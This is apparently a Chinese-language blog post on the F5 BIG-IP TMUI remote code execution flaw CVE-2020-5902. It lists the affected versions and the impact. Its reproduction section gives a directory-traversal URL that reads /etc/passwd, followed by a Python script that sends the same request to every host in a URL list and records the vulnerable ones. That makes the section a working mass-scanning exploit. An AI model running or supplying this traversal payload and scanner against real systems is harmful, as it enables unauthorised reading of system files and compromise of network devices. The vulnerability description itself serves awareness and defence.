BIG-IP ADC RCE漏洞(CVE-2020-5902)

F5(F5 Networks)作为全球领先的应用交付网络(ADN)领域的厂商,6月被曝出BIG-IP(负载均衡)中两个严重漏洞,代号分别为CVE-2020-5902和CVE-2020-5903，就在上次HW期间，就见到过很多这个F5的设备，金融企业存在这种高危漏洞，想想都可怕。

一丶漏洞简介

该漏洞是BIG-IP管理界面中称为“远程代码执行”漏洞，称为TMUI(流量管理用户界面)。未经身份验证的攻击者可以通过将恶意制作的HTTP请求发送到托管用于BIG-IP配置的流量管理用户界面(TMUI)实用程序的易受攻击的服务器来远程利用此漏洞。

成功利用此漏洞可能使攻击者获得对该设备的完全管理员控制，最终使他们无需任何授权就可以在受感染的设备上执行他们想要的任何任务。攻击者可以创建或删除文件，禁用服务，拦截信息，执行任意系统命令和Java代码，破坏整个系统，并采取进一步的目标，如内部网络，在这种情况下，RCE是由多个组件中的安全漏洞导致的，例如允许目录遍历的组件。

该漏洞影响公司的BIG-IP产品。这些是可以用作Web流量整形系统，负载平衡器，防火墙，访问网关，速率限制器或SSL中间件的多功能网络设备。

二丶影响版本

BIG-IP 15.x: 15.1.0/15.0.0

BIG-IP 14.x: 14.1.0 ~ 14.1.2

BIG-IP 13.x: 13.1.0 ~ 13.1.3

BIG-IP 12.x: 12.1.0 ~ 12.1.5

BIG-IP 11.x: 11.6.1 ~ 11.6.5

三丶漏洞复现

https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

import requests import urllib.parse import pandas as pd import time import warnings warnings.filterwarnings('ignore') def az(urls): try: cc = urls+ ("/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd") res=requests.get(url =cc,verify = False) res.raise_for_status() if res.status_code == 200: with open('Vulnerability.txt', mode='a', encoding='utf-8') as f: f.write(urls+'\n') except requests.RequestException as e: print(e) time.sleep(1) print(cc) print(res) def main(): url_lst=[] # f=open('ip.txt',encoding='utf8') f = pd.read_csv(open(r'url.txt')) # ip_str=f.readlines() for u in list(f['U']): u=u.replace(' ', '') u=u.replace('\n', '') u_lst=[u] url_lst=url_lst+u_lst for i in url_lst: az(i) if __name__ == '__main__': main()